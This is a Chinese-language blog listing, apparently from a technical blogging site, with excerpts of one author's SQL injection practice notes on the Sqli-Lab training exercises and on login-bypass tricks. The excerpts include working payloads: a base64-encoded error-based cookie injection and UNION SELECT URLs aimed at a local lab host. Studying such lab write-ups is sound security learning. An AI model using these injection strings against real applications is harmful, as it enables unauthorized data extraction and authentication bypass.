SQL注入
Joker_York
这个作者很懒,什么都没留下…
展开
-
Sqli-Lab第二部分(Advanced Injections)练习记录(非讲解,个人记录用)
Cookie Injection21. Base64-encodedpayload:uname=LTEnKSBvciB1cGRhdGV4bWwoMCwgY29uY2F0KDB4NWMsIChzZWxlY3QgZGF0YWJhc2UoKSkpLCAxKSM=只是将payload做了一个base64编码22. 同上,只是单引号闭合换成双引号闭合23. Strip comments这题的题目意思没看太明白,不过注入过程发现是过滤了 #,-- 这两种注释的字符,因此只能使用引号闭合,payload如原创 2020-09-01 17:52:46 · 339 阅读 · 0 评论 -
SQL注入积累
登陆(用户名不存在)登陆验证通常有两种方式:直接对用户输入的账号名和密码进行查询------提示用户名或密码错误针对用户输入的账号名进行查询对应的密码,再和用户输入的密码做比较------用户名错误时会提示用户名不存在这里讨论第二种情况,验证代码逻辑可能如下:select password from xx where username=xx;if(password==pass)then login因此,可以使用如下联合查询方式将自定义字符注入password参数(令username为F原创 2020-08-26 15:10:55 · 187 阅读 · 0 评论 -
Sqli-Lab第一部分(Basic Challenges)练习记录(非讲解,个人记录用)
GET - Error based1. Single quotes-Stringhttp://192.168.205.128:8080/Less-1/?id=-1%27%20union%20select%201,2,database()%232. Intiger basedhttp://192.168.205.128:8080/Less-2/?id=-1%20union%20select%201,2,database()%233. Single quotes with twist-stri原创 2020-07-24 15:01:17 · 342 阅读 · 0 评论